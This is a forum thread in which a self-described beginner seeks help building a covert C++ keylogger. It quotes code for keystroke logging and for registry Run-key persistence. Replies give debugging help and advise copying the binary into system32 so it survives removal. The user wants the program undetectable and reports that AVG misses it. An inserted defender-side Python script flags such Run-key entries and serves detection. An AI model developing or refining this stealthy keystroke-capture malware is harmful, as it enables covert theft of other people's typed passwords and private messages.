(C++) keylogger code question

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

Post by Still_Learning »

Ok, I have this code, and it works, but for some reason it does not save that much to the text file that has all the keystrokes in it (it only saves a keylogged file of like the newest 5 lines or 10 words). I'm trying to get it to save everything typed in within a 24 hour period or so, not just the last 10 words typed. I tried changing #'s in the variables and such to get it to save more information than a 1k text file but have not gotten it to work yet. It also flashes a small black DOS screen for like half of a second when loaded, which would be noticeable for a user running it. I posted the link for the code below, thanks.

http://code.suck-o.com/92

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

Well it seems like when the logfile reaches "LogLength" it will close the file and then reopen it, causing the data to be overwritten. So I guess you could either change the "LogLength" limit, or rewrite the if statement further down so that it stops at a specific time.

It's odd though, because it reads it into buffer, and then closes the file. Then opens it again. You would think that it would flush the buffer into the file again after that. But it has a maximum buffer, and also it has a "sleep 10" further up to make it not use 100% cpu.

Changing this if statement, seems to be the most logical thing to do ^^, I haven't read all the code, but that's my conclusion from just waking up.

Code: Select all

if(len>=LogLength)
{

fseek(file,0,SEEK_SET);//go to beg.
buf=(char *)malloc(len);//malloc buffer
freadindex=fread(buf,1,len,file);//read into buffer
buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
fclose(file);
file = fopen(FileName,"w");
}
"The best place to hide a tree, is in a forest"

Post by Still_Learning »

I tried changing the log length from 100 to 1000 but did not see a difference when the log file was created.

Wouldn't not using 100% be more stealth? As of now I ran it through AVG scanner and it is undetectable, but Comodo firewall catches it (if you read the info before clicking "Allow")..

What would you recommend changing in the IF statement? I'm a noob at this, this is my first C++ project I guess, but I am learning a lot by doing this, thanks Cats!

Post by ayu »

Well there are some oddities in the code, and I can't really go through it all at the moment (studying for an exam), but you can try to remove or lessen "sleep 10", to "sleep 1" or something, to see if it does anything. Because as it looks now, it puts the whole program to sleep for 10 seconds, then continues to check for keys, but I guess it would work if it reads from the buffer and then flushes to the file.

I can take a closer look at it later, the "check char" part looks pretty good though ^^.
"The best place to hide a tree, is in a forest"

Post by Still_Learning »

Ok, I think I have it working now.. the only question now I guess is why won't it run automatically when Windows starts up? I can see where the registry key was added with the code

Code: Select all

/* Grab filename of process/exe using GetModuleFileName() function. */
    TCHAR szPath[MAX_PATH];

 
    GetModuleFileName(NULL,
                      szPath,
                      MAX_PATH);

 
    /* Create a New HKEY. */
    HKEY newValue;
 
    /* Open Registry key. */

    RegOpenKey(HKEY_LOCAL_MACHINE,
               "Software\\Microsoft\\Windows\\CurrentVersion\\Run",

               &newValue);
 
    /* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

        current user only.
 
        Now give a new value.
 
        Syntax for RegSetValueEx() function is
        LONG WINAPI RegSetValueEx(
        __in        HKEY hKey,
        __in_opt    LPCTSTR lpValueName,

        __reserved  DWORD Reserved,
        __in        DWORD dwType,
        __in_opt    const BYTE* lpData,
        __in        DWORD cbData
        );
 
        More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */

 
    RegSetValueEx(newValue,
                  "keylogger2.exe",
                  0,

                  REG_SZ,
                  (LPBYTE)szPath,
                  sizeof(szPath));

 
    /* Close the key. */
    RegCloseKey(newValue);
    return 0;
When I run it, I can see it in the processes and see the key logging working, but on restart it does not seem to be working / autorun..

What am I doing wrong :oops:

So far I want the keylogger to auto start on Windows boot and write to the log file, that's it.. and to make it as stealth as possible. So far, I've gotten it to just flash a black DOS screen for like half a second, no flashing screen would be best though.. any suggestions for a fix?

the new code is at http://code.suck-o.com/93

Post by ayu »

Well, did you check the registry to see that it adds the key? And is your file named "keylogger2.exe" as it says in the code? And is the path for the file added correctly?

A tip is to make a syscall and have the system copy the file to a specified location (like system32) and then make the key point to the file there, so even if the user removes the file that he/she ran, it would still run from system32 the next time. Also, make sure that the program "checks" if the file exists in system32, before it tries to copy the file (no use doing it if it already exists)
"The best place to hide a tree, is in a forest"
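
Added example (not part of the thread and not any poster's code): a defender-side check for the traces the `RegSetValueEx` call quoted above would leave in a `Run` key. It assumes raw `REG_SZ` data obtained from a hive parser, stored as UTF-16LE, and that the oversized `cbData` (`sizeof(szPath)`, the whole `MAX_PATH` buffer) carries through to the stored length; the `RunValue`, `audit`, `split_reg_sz` and `reg_sz` names and the sample values are constructed for illustration.

```python
from dataclasses import dataclass

MAX_PATH = 260  # buffer length used by the posted code

@dataclass
class RunValue:
    hive: str    # "HKLM" or "HKCU"
    name: str    # value name under ...\CurrentVersion\Run
    raw: bytes   # REG_SZ data as stored in the hive (UTF-16LE, assumed)

def split_reg_sz(raw: bytes) -> tuple[str, bytes]:
    """Split stored REG_SZ data into the string and any bytes after its NUL."""
    for i in range(0, len(raw) - 1, 2):
        if raw[i:i + 2] == b"\x00\x00":
            return raw[:i].decode("utf-16-le", "replace"), raw[i + 2:]
    return raw.decode("utf-16-le", "replace"), b""

def audit(value: RunValue) -> list[str]:
    """Return the reasons a Run value deserves a closer look (heuristics)."""
    findings = []
    path, slack = split_reg_sz(value.raw)
    if slack:
        # Written with cbData larger than the string, e.g. sizeof(buffer).
        findings.append(f"{len(slack)} bytes stored after the terminator")
    target = path.strip('"').rsplit("\\", 1)[-1]
    if target and value.name.lower() == target.lower():
        findings.append("value name is the executable's own file name")
    return findings

def reg_sz(path: str, char_count: int = 0) -> bytes:
    """Build constructed REG_SZ data, optionally padded to char_count chars."""
    data = (path + "\0").encode("utf-16-le")
    return data + b"\xcc" * max(0, char_count * 2 - len(data))

# Constructed sample values, not taken from a real system.
SAMPLES = [
    RunValue("HKLM", "ExampleUpdater",
             reg_sz(r"C:\Program Files\Example\updater.exe")),
    RunValue("HKLM", "keylogger2.exe",
             reg_sz(r"C:\Users\demo\Desktop\keylogger2.exe", MAX_PATH)),
]

if __name__ == "__main__":
    for v in SAMPLES:
        print(v.hive, v.name, audit(v) or "ok")
```

Both checks are triage heuristics: legitimate installers occasionally trip them, so a hit is a reason to inspect the target binary, not a verdict.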

Post by Still_Learning »

Yes, the registry setting is there, and the name "keylogger2.exe" is right, paths are correct, but it still does not load at the start of Windows..

How do I determine how big of a logfile it creates?

Post by ayu »

I'm a little confused by the code now ^^

The part with the filesize is nowhere to be found now =/

and main is ending before it gets to the last loop it seems, and the last loop is endless.
"The best place to hide a tree, is in a forest"

Post by Still_Learning »

Humm... how would I make it log up to say 5 MB of keys, then keep overwriting the oldest text with newer after it hits the 5 MB mark?

I am not sure how to define the filesize..

or why it is not booting along with Windows ...

:?: Bad Brain, DNR, Floodhoundz, anyone else have an idea or helpful advice? The code compiles and works, but not how I want it to yet, thanks

Post by ayu »

Well, as mentioned in the code....

Code: Select all

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

        current user only. 
Try that instead (it should work anyway, but since I don't have Windows, I can't and won't test the code)
"The best place to hide a tree, is in a forest"

qeinar
Newbie
Posts: 1
Joined: 28 Oct 2008, 17:00

Post by qeinar »

The sleep function is given in milliseconds so sleep(1) would be close to nothing.. for the showing screen, it's just how long it takes to execute the stealth command you're using.

Post by ayu »

qeinar wrote: The sleep function is given in milliseconds so sleep(1) would be close to nothing.. for the showing screen, it's just how long it takes to execute the stealth command you're using.
Ah yes, that is correct, I was referring to the system call. My apologies
"The best place to hide a tree, is in a forest"

Post by Still_Learning »

qeinar wrote: The sleep function is given in milliseconds so sleep(1) would be close to nothing.. for the showing screen, it's just how long it takes to execute the stealth command you're using.
Yeah but it still shows :(

Even with sleep(0) it flashes real quick

Also I am having other bugs, anyone want to co-help on making a keylogger? I am trying to learn C++ and figured this would be a nice project. Cats, you are also learning, correct? Let's collaborate on a keylogger

:twisted:

Post by ayu »

I have enough work to do at Uni, so I think I'll pass this time =)
"The best place to hide a tree, is in a forest"

Post by Still_Learning »

cats wrote: I have enough work to do at Uni, so I think I'll pass this time =)
8O ok
